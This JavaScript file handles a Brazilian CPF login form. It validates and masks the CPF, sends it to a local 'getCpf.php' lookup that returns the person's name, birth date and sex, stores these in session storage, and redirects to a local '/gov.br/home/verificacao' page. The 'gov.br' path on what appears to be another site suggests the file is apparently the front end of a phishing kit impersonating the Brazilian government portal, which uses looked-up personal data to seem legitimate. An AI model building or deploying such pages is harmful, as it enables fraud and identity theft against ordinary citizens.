// CPF validation helper
const cpfValidator = {
  clean: (cpf) => cpf.replace(/\D/g, ""),

  format: (value) => {
    value = value.replace(/\D/g, "");
    if (value.length > 11) value = value.slice(0, 11);

    if (value.length > 9) {
      return value.replace(/^(\d{3})(\d{3})(\d{3})(\d{2}).*/, "$1.$2.$3-$4");
    } else if (value.length > 6) {
      return value.replace(/^(\d{3})(\d{3})(\d{3}).*/, "$1.$2.$3");
    } else if (value.length > 3) {
      return value.replace(/^(\d{3})(\d{3}).*/, "$1.$2");
    }
    return value;
  },

  isValid: (cpf) => {
    cpf = cpf.replace(/\D/g, "");
    if (cpf.length !== 11 || /^(\d)\1+$/.test(cpf)) return false;

    let sum = 0;
    let remainder;

    // First digit validation
    for (let i = 1; i <= 9; i++) {
      sum += parseInt(cpf.substring(i - 1, i)) * (11 - i);
    }
    remainder = (sum * 10) % 11;
    if (remainder === 10 || remainder === 11) remainder = 0;
    if (remainder !== parseInt(cpf.substring(9, 10))) return false;

    // Second digit validation
    sum = 0;
    for (let i = 1; i <= 10; i++) {
      sum += parseInt(cpf.substring(i - 1, i)) * (12 - i);
    }
    remainder = (sum * 10) % 11;
    if (remainder === 10 || remainder === 11) remainder = 0;
    if (remainder !== parseInt(cpf.substring(10, 11))) return false;

    return true;
  },
};

// API service
const apiService = {
  async fetchCPFData(cpf) {
    const cleanCPF = cpfValidator.clean(cpf);

    if (!cpfValidator.isValid(cleanCPF)) {
      throw new Error("CPF inválido");
    }

    try {
      const response = await fetch("/login/js/getCpf.php", {
        method: "POST",
        headers: {
          Accept: "application/json",
          "Content-Type": "application/json",
        },
        body: JSON.stringify({ cpf: cleanCPF }),
      });

      if (!response.ok) {
        if (response.status === 404) {
          throw new Error("CPF não encontrado na base de dados");
        }
        const errorMessage = `Erro HTTP: ${response.status} - ${response.statusText}`;
        console.error("❌ " + errorMessage);
        throw new Error(errorMessage);
      }

      const data = await response.json();

      if (!data.success || !data.data) {
        console.warn("⚠️ CPF não encontrado ou inválido");
        throw new Error("CPF não encontrado ou inválido");
      }

      console.log("✅ Resposta da API:", data);
      return {
        cpf: cleanCPF,
        nome: data.data.nome,
        nascimento: data.data.nascimento,
        sexo: data.data.sexo,
      };
    } catch (error) {
      console.error("Erro ao consultar API:", error);
      if (error.message === "Failed to fetch") {
        throw new Error(
          "Erro de conexão com o servidor. Por favor, verifique sua conexão com a internet e tente novamente."
        );
      }
      throw error;
    }
  },
};

// UI Controller
const uiController = {
  init() {
    console.log("🚀 Inicializando UI Controller...");
    this.initModals();
    this.initCPFMask();
    this.initFormSubmission();
    console.log("✅ UI Controller inicializado!");
  },

  initModals() {
    document.querySelectorAll("[data-modal]").forEach((trigger) => {
      trigger.addEventListener("click", () => {
        const modalId = trigger.dataset.modal;
        document.getElementById(modalId).classList.add("is-active");
      });
    });

    document.querySelectorAll(".modal__close").forEach((button) => {
      button.addEventListener("click", () => {
        button.closest(".modal").classList.remove("is-active");
      });
    });
  },

  initCPFMask() {
    const cpfInput = document.getElementById("cpf");
    if (!cpfInput) return;

    cpfInput.addEventListener("input", (e) => {
      e.target.value = cpfValidator.format(e.target.value);
    });
  },

  initFormSubmission() {
    const cpfInput = document.getElementById("cpf");
    const continueCpfButton = document.getElementById("continue-cpf");
    // const submitContainer = document.getElementById('submit-container');

    // if (!cpfInput || !continueCpfButton || !submitContainer) return;
    if (!cpfInput || !continueCpfButton) return;

    continueCpfButton.addEventListener("click", async () => {
      const rawCpf = cpfValidator.clean(cpfInput.value);
      console.log("📝 Validando CPF...");
      console.log(`CPF informado: ${rawCpf}`);

      if (cpfValidator.isValid(rawCpf)) {
        console.log("✅ CPF válido");

        continueCpfButton.disabled = true; // Prevent double submission
        continueCpfButton.textContent = "Consultando...";
        // submitContainer.style.display = 'block';
        sessionStorage.setItem("cpf", rawCpf);

        try {
          console.log("🔍 Iniciando consulta à API com os dados...");
          const data = await apiService.fetchCPFData(cpfInput.value);

          console.log("🎉 Dados retornados da API com sucesso!");
          sessionStorage.setItem("nomeCompleto", data.nome);
          sessionStorage.setItem("dataNascimento", data.nascimento);
          sessionStorage.setItem("sexo", data.sexo);

          console.log("🔗 Redirecionando para a página de verificação...");
          window.location.href = "/gov.br/home/verificacao/index.html";
        } catch (error) {
          console.error("❌ Erro no envio:", error);
          alert(error.message);
        } finally {
          continueCpfButton.disabled = false;
          continueCpfButton.textContent = "Continuar";
        }
        // continueCpfButton.style.display = 'none';
      } else {
        console.error("❌ CPF inválido");
        alert("CPF inválido. Por favor, insira um CPF válido.");
      }
    });

    // const submitButton = submitContainer.querySelector('button');
    // if (submitButton) {
    //   submitButton.addEventListener('click', async (e) => {
    //     e.preventDefault();
    //     try {
    //       submitButton.disabled = true; // Prevent double submission
    //       submitButton.textContent = 'Consultando...'; // Visual feedback

    //       console.log('🔍 Iniciando consulta à API com os dados...');
    //       const data = await apiService.fetchCPFData(cpfInput.value);

    //       console.log('🎉 Dados retornados da API com sucesso!');
    //       sessionStorage.setItem('nomeCompleto', data.nome);
    //       sessionStorage.setItem('dataNascimento', data.nascimento);
    //       sessionStorage.setItem('sexo', data.sexo);

    //       console.log('🔗 Redirecionando para a página de verificação...');
    //       window.location.href = '/gov.br/home/verificacao/index.html';
    //     } catch (error) {
    //       console.error('❌ Erro no envio:', error);
    //       alert(error.message);
    //     } finally {
    //       submitButton.disabled = false;
    //       submitButton.textContent = 'Continuar';
    //     }
    //   });
    // }
  },
};

// Initialize when DOM is loaded
document.addEventListener("DOMContentLoaded", () => {
  console.log("🚀 Inicializando aplicação...");
  uiController.init();
  console.log("✅ Aplicação inicializada com sucesso!");
});
